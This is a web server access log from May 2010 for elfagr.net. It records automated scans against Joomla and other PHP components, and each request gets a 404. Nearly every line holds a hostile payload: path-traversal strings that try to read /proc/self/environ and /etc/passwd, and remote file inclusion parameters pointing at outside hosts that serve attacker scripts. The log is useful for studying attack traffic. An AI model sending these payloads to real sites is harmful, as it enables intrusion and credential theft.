114.108.151.149 - - [20/May/2010:02:30:59 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
114.108.151.149 - - [20/May/2010:02:31:00 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
208.43.122.86 - - [20/May/2010:02:32:21 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [20/May/2010:02:33:05 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [20/May/2010:02:33:05 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
114.108.151.149 - - [20/May/2010:02:33:50 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
94.23.9.198 - - [20/May/2010:02:34:31 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
94.23.9.198 - - [20/May/2010:02:34:32 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
94.23.9.198 - - [20/May/2010:02:34:32 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
94.23.9.198 - - [20/May/2010:02:38:35 -0700] "GET /logs/access.log/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
94.23.9.198 - - [20/May/2010:02:38:45 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
94.23.9.198 - - [20/May/2010:02:38:36 -0700] "GET /logs/index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "elfagr.net"
208.43.122.86 - - [20/May/2010:02:40:06 -0700] "GET /logs/access.log/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
208.43.122.86 - - [20/May/2010:02:40:06 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
208.43.122.86 - - [20/May/2010:02:39:57 -0700] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [20/May/2010:02:40:51 -0700] "GET /logs/access.log/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [20/May/2010:02:40:51 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [20/May/2010:02:40:51 -0700] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [20/May/2010:02:41:07 -0700] "GET /logs/access.log/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [20/May/2010:02:41:16 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
64.251.10.117 - - [20/May/2010:02:41:16 -0700] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
208.43.122.86 - - [20/May/2010:02:45:59 -0700] "GET /logs/access.log/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
208.43.122.86 - - [20/May/2010:02:46:08 -0700] "GET /index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
208.43.122.86 - - [20/May/2010:02:45:59 -0700] "GET /logs/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
66.249.129.245 - - [20/May/2010:02:46:27 -0700] "GET /logs/access.log/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "elfagr.net"
66.249.129.245 - - [20/May/2010:02:46:36 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "elfagr.net"
66.249.129.245 - - [20/May/2010:02:46:36 -0700] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "elfagr.net"
77.79.246.241 - - [20/May/2010:02:46:53 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller= HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
77.79.246.241 - - [20/May/2010:02:46:54 -0700] "GET /index.php?option=com_fabrik&controller= HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
77.79.246.241 - - [20/May/2010:02:46:54 -0700] "GET /logs/index.php?option=com_fabrik&controller= HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
66.249.129.245 - - [20/May/2010:02:48:25 -0700] "GET /logs/access.log/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "elfagr.net"
66.249.129.245 - - [20/May/2010:02:48:34 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "elfagr.net"
66.249.129.245 - - [20/May/2010:02:48:34 -0700] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "elfagr.net"
124.217.229.185 - - [20/May/2010:02:48:35 -0700] "GET /index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
124.217.229.185 - - [20/May/2010:02:48:35 -0700] "GET /index.php?option=com_fabrik&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "elfagr.net"
76.12.147.249 - - [20/May/2010:02:52:05 -0700] "GET /logs//include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.elfagr.net"
76.12.147.249 - - [20/May/2010:02:51:56 -0700] "GET /include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.elfagr.net"
114.108.151.149 - - [20/May/2010:02:52:24 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
66.249.129.245 - - [20/May/2010:02:52:26 -0700] "GET /logs/access.log/*.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "elfagr.net"
66.249.129.245 - - [20/May/2010:02:52:26 -0700] "GET /*.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "elfagr.net"
66.249.129.245 - - [20/May/2010:02:52:26 -0700] "GET /logs/*.php?option=com_joomlaupdater&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "elfagr.net"
114.108.151.149 - - [20/May/2010:02:52:53 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [20/May/2010:02:55:00 -0700] "GET /logs/access.log/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [20/May/2010:02:55:01 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [20/May/2010:02:55:01 -0700] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [20/May/2010:02:55:03 -0700] "GET /logs/access.log/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [20/May/2010:02:55:03 -0700] "GET /index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
114.108.151.149 - - [20/May/2010:02:55:04 -0700] "GET /logs/index.php?option=com_sbsfile&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
69.162.113.66 - - [20/May/2010:02:55:14 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "elfagr.net"
69.162.113.66 - - [20/May/2010:02:55:14 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "elfagr.net"
69.162.113.66 - - [20/May/2010:02:55:14 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "elfagr.net"
76.12.147.249 - - [20/May/2010:02:56:13 -0700] "GET /include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.823" "www.elfagr.net"
69.162.113.66 - - [20/May/2010:02:56:51 -0700] "GET /logs/access.log/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "elfagr.net"
69.162.113.66 - - [20/May/2010:02:57:00 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "elfagr.net"
69.162.113.66 - - [20/May/2010:02:56:51 -0700] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "elfagr.net"
69.162.113.66 - - [20/May/2010:02:56:51 -0700] "GET /logs/access.log/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "elfagr.net"
69.162.113.66 - - [20/May/2010:02:57:00 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "elfagr.net"
69.162.113.66 - - [20/May/2010:02:56:51 -0700] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "elfagr.net"
69.162.113.66 - - [20/May/2010:02:56:51 -0700] "GET /logs/access.log/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "elfagr.net"
69.162.113.66 - - [20/May/2010:02:56:51 -0700] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "elfagr.net"
69.162.113.66 - - [20/May/2010:02:57:01 -0700] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "elfagr.net"
178.32.3.34 - - [20/May/2010:02:59:44 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
178.32.3.34 - - [20/May/2010:02:59:53 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
178.32.3.34 - - [20/May/2010:02:59:51 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
84.40.30.37 - - [20/May/2010:03:01:17 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.40.30.37 - - [20/May/2010:03:01:17 -0700] "GET /logs/access.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.40.30.37 - - [20/May/2010:03:01:17 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.40.30.37 - - [20/May/2010:03:01:43 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.40.30.37 - - [20/May/2010:03:01:34 -0700] "GET /logs/access.log%20%20/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
84.40.30.37 - - [20/May/2010:03:01:34 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "elfagr.net"
74.124.219.45 - - [20/May/2010:03:01:56 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
74.124.219.45 - - [20/May/2010:03:02:05 -0700] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
74.124.219.45 - - [20/May/2010:03:01:56 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.apatar.com/modules/readme.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
211.239.161.143 - - [20/May/2010:03:02:59 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
211.239.161.143 - - [20/May/2010:03:03:09 -0700] "GET /logs/components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "elfagr.net"
124.217.229.185 - - [20/May/2010:03:03:12 -0700] "GET /include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
124.217.229.185 - - [20/May/2010:03:03:12 -0700] "GET /include/admin.lib.inc.php?site_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.elfagr.net"
114.108.151.149 - - [20/May/2010:03:04:58 -0700] "GET /logs/access_091203.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
114.108.151.149 - - [20/May/2010:03:04:50 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
114.108.151.149 - - [20/May/2010:03:04:50 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
178.32.3.34 - - [20/May/2010:03:05:34 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
178.32.3.34 - - [20/May/2010:03:05:34 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
178.32.3.34 - - [20/May/2010:03:05:43 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
178.32.3.34 - - [20/May/2010:03:05:46 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
178.32.3.34 - - [20/May/2010:03:05:37 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
178.32.3.34 - - [20/May/2010:03:05:46 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
178.32.3.34 - - [20/May/2010:03:05:38 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
178.32.3.34 - - [20/May/2010:03:05:38 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
178.32.3.34 - - [20/May/2010:03:05:38 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
178.32.3.34 - - [20/May/2010:03:05:39 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
178.32.3.34 - - [20/May/2010:03:05:39 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
178.32.3.34 - - [20/May/2010:03:05:48 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
178.32.3.34 - - [20/May/2010:03:05:53 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
178.32.3.34 - - [20/May/2010:03:05:53 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
178.32.3.34 - - [20/May/2010:03:05:44 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
178.32.3.34 - - [20/May/2010:03:05:53 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
178.32.3.34 - - [20/May/2010:03:05:53 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
178.32.3.34 - - [20/May/2010:03:06:02 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
114.108.151.149 - - [20/May/2010:03:06:12 -0700] "GET /logs/access_100114.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
222.231.60.209 - - [20/May/2010:03:09:23 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
222.231.60.209 - - [20/May/2010:03:09:14 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
79.174.72.67 - - [20/May/2010:03:13:59 -0700] "GET /logs/access_100211.log/errors.php?error=http://robots.interfree.it/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
79.174.72.67 - - [20/May/2010:03:13:59 -0700] "GET /errors.php?error=http://robots.interfree.it/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
79.174.72.67 - - [20/May/2010:03:14:00 -0700] "GET /logs//errors.php?error=http://robots.interfree.it/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
79.174.72.67 - - [20/May/2010:03:14:00 -0700] "GET /logs/access_100128.log/errors.php?error=http://robots.interfree.it/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
222.231.60.209 - - [20/May/2010:03:16:03 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
222.231.60.209 - - [20/May/2010:03:16:04 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
222.231.60.209 - - [20/May/2010:03:16:14 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
74.55.52.154 - - [20/May/2010:03:16:17 -0700] "GET /logs/access_100211.log/errors.php?error=http://robots.interfree.it/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
74.55.52.154 - - [20/May/2010:03:16:18 -0700] "GET /errors.php?error=http://robots.interfree.it/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
74.55.52.154 - - [20/May/2010:03:16:18 -0700] "GET /logs//errors.php?error=http://robots.interfree.it/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
89.111.173.43 - - [20/May/2010:03:20:03 -0700] "GET /logs/access_100211.log/errors.php?error=http://robots.interfree.it/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
89.111.173.43 - - [20/May/2010:03:19:55 -0700] "GET /errors.php?error=http://robots.interfree.it/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
89.111.173.43 - - [20/May/2010:03:20:04 -0700] "GET /logs//errors.php?error=http://robots.interfree.it/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
89.111.173.43 - - [20/May/2010:03:20:43 -0700] "GET /logs/access_100204.log/errors.php?error=http://robots.interfree.it/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
89.111.173.43 - - [20/May/2010:03:20:35 -0700] "GET /errors.php?error=http://robots.interfree.it/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
89.111.173.43 - - [20/May/2010:03:20:35 -0700] "GET /logs//errors.php?error=http://robots.interfree.it/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
67.18.19.146 - - [20/May/2010:03:28:32 -0700] "GET /index.php?option=where_framework&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
67.18.19.146 - - [20/May/2010:03:28:33 -0700] "GET /index.php?option=where_framework&view=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
67.18.19.146 - - [20/May/2010:03:28:57 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
202.43.88.242 - - [20/May/2010:03:29:00 -0700] "GET /logs/access_100311.log///bbs//skin/daerew_45galleryGD/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
202.43.88.242 - - [20/May/2010:03:29:00 -0700] "GET //bbs//skin/daerew_45galleryGD/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
202.43.88.242 - - [20/May/2010:03:29:00 -0700] "GET /logs///bbs//skin/daerew_45galleryGD/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
202.43.88.242 - - [20/May/2010:03:29:09 -0700] "GET /logs/access_100128.log///bbs//skin/daerew_45galleryGD/setup.php?dir=http://nic.bupt.edu.cn/media/j1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.elfagr.net"
67.18.19.146 - - [20/May/2010:03:29:02 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "elfagr.net"
222.231.60.209 - - [20/May/2010:03:29:10 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
222.231.60.209 - - [20/May/2010:03:29:11 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "elfagr.net"
